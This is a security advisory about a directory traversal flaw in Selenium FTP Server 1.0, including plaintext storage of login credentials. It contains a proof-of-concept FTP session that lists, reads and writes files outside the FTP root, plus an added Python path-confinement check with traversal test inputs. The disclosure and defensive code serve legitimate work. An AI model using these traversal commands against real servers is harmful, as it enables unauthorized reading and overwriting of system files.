SECURITYVULNS:DOC:15094
Nov 16, 2006

[NT] Selenium FTP Server Directory Traversal


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com



Selenium FTP Server Directory Traversal

SUMMARY

<http://bibasoftware.com/?page_id=15> Selenium FTP Server is vulnerable
to a directory traversal input validation error: a remote unauthenticated
user can use the DIR, LIST, NLST, etc. commands to display any file on the
remote server, use the GET/RECV command to retrieve any file outside the
FTP root, and use PUT/SEND to write to any location on the remote server.

DETAILS

Vulnerable Systems:

  • Selenium FTP Server version 1.0

Proof of concept:
C:\LinaresExploits\>ftp localhost
Connected to GregL-WS.
220 Selenium Server FTP (http://bibasoftware.com)
User (GregL-WS:(none)):
331 Password required for .
Password:
230 User logged in.
ftp> dir \windows
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw- 1 ftp ftp 0 Nov 14 15:53 WINDOWS
226 File sent ok
ftp: 63 bytes received in 0.02Seconds 3.94Kbytes/sec.
ftp> dir \windows\*.exe
200 Port command successful.
150 Opening data connection for directory list.
-rwxrwxrwx 1 ftp ftp 68096 May 02 2005 agrsmdel.exe
-rwxrwxrwx 1 ftp ftp 44544 Jun 02 1998 clspack.exe
-rwxrwxrwx 1 ftp ftp 1032192 Aug 04 2004 explorer.exe
-rwxrwxrwx 1 ftp ftp 10752 May 26 2005 hh.exe
-rwxrwxrwx 1 ftp ftp 306688 Oct 29 1998 IsUninst.exe
-rwxrwxrwx 1 ftp ftp 112640 Jul 01 2001 lsb_un20.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad.exe
-rwxrwxrwx 1 ftp ftp 69120 Aug 04 2004 notepad1.exe
-rwxrwxrwx 1 ftp ftp 146432 Aug 04 2004 regedit.exe
-rwxrwxrwx 1 ftp ftp 46352 Feb 28 2003 setdebug.exe
-rwxrwxrwx 1 ftp ftp 286720 Sep 07 14:10 Setup1.exe
-rwxrwxrwx 1 ftp ftp 32866 Aug 04 2004 slrundll.exe
-rwxrwxrwx 1 ftp ftp 46592 Aug 02 2002 SOUNDMAN.EXE
-rwxrwxrwx 1 ftp ftp 73216 Sep 07 14:10 ST6UNST.EXE
-rwxrwxrwx 1 ftp ftp 15360 Aug 04 2004 taskman.exe
-rwxrwxrwx 1 ftp ftp 90624 Oct 27 13:22 tsuninst1.exe
-rwxrwxrwx 1 ftp ftp 49680 Aug 04 2004 twunk_16.exe
-rwxrwxrwx 1 ftp ftp 25600 Aug 04 2004 twunk_32.exe
-rwxrwxrwx 1 ftp ftp 299520 Mar 23 1999 uninst.exe
-rwxrwxrwx 1 ftp ftp 107134 Apr 04 08:06 UninstallFirefox.exe
-rwxrwxrwx 1 ftp ftp 86016 Dec 17 1999 unvise32.exe
-rwxrwxrwx 1 ftp ftp 256192 Aug 04 2004 winhelp.exe
-rwxrwxrwx 1 ftp ftp 283648 Aug 04 2004 winhlp32.exe
226 File sent ok
ftp: 1557 bytes received in 0.03Seconds 50.23Kbytes/sec.
ftp> get …\windows\win.ini C:\mine.txt
200 Port command successful.
150 Opening data connection for …\windows\win.ini.
226 File sent ok
ftp: 1039 bytes received in 0.00Seconds 1039000.00Kbytes/sec.
ftp> put C:\mine.txt …\windows\toobad.txt
200 Port command successful.
150 Opening data connection for …\windows\toobad.txt.
226 File received ok
ftp: 1039 bytes sent in 0.00Seconds 1039000.00Kbytes/sec.

Furthermore, the software improperly writes any username/password that
might be used to log in to the program, in plaintext, to the file[s] stored
in the default directory of C:\Program Files\BiBa SOFTWARE\Selenium
Server\Servers.
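
The check that the transcript above shows to be missing, written as an added example (not code from the advisory or from the vendor): every path argument is normalized and confined to the FTP root before it is used. The root C:\ftproot, the function and exception names, and the sample arguments are assumptions constructed for illustration; ntpath is used so the Windows path rules apply on any platform.

```python
import ntpath


class PathRejected(Exception):
    """Client-supplied path would resolve outside the FTP root."""


def resolve_ftp_path(root, cwd, requested):
    """Map a client path to a Windows path guaranteed to sit under root.

    root      -- absolute directory served as the FTP root (assumed value)
    cwd       -- session's virtual working directory, e.g. "/" or "/pub"
    requested -- raw argument of LIST/NLST/RETR/STOR as sent by the client
    """
    if "\x00" in requested or ":" in requested:
        # NUL bytes, drive letters (C:) and NTFS alternate data streams.
        raise PathRejected(requested)
    # FTP clients may send either separator; treat both as Windows does.
    virtual = requested.replace("/", "\\")
    if not virtual.startswith("\\"):
        virtual = cwd.replace("/", "\\").rstrip("\\") + "\\" + virtual
    # A leading separator means the virtual root, never the drive root.
    # Stripping it also neutralizes UNC-style prefixes (\\host\share).
    candidate = ntpath.normpath(ntpath.join(root, virtual.lstrip("\\")))
    root_norm = ntpath.normpath(root)
    # normpath has collapsed every ".."; compare whole path components so
    # a sibling such as C:\ftproot2 does not pass as a prefix match.
    common = ntpath.commonpath([root_norm, candidate])
    if common.lower() != root_norm.lower():
        raise PathRejected(requested)
    # String-level check only: a real server must also resolve junctions
    # and symlinks under the root before opening the file.
    return candidate


if __name__ == "__main__":
    # Constructed arguments modelled on the commands in the transcript.
    for arg in [r"\windows\*.exe", r"..\..\windows\win.ini", r"C:\mine.txt"]:
        try:
            print("ALLOW", resolve_ftp_path(r"C:\ftproot", "/", arg))
        except PathRejected:
            print("DENY ", arg)
```

With this mapping a request for \windows resolves to C:\ftproot\windows instead of the system directory, and any argument that still escapes the root after normalization is refused for reads and writes alike.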

ADDITIONAL INFORMATION

The information has been provided by <mailto:[email protected]>
Greg Linares.
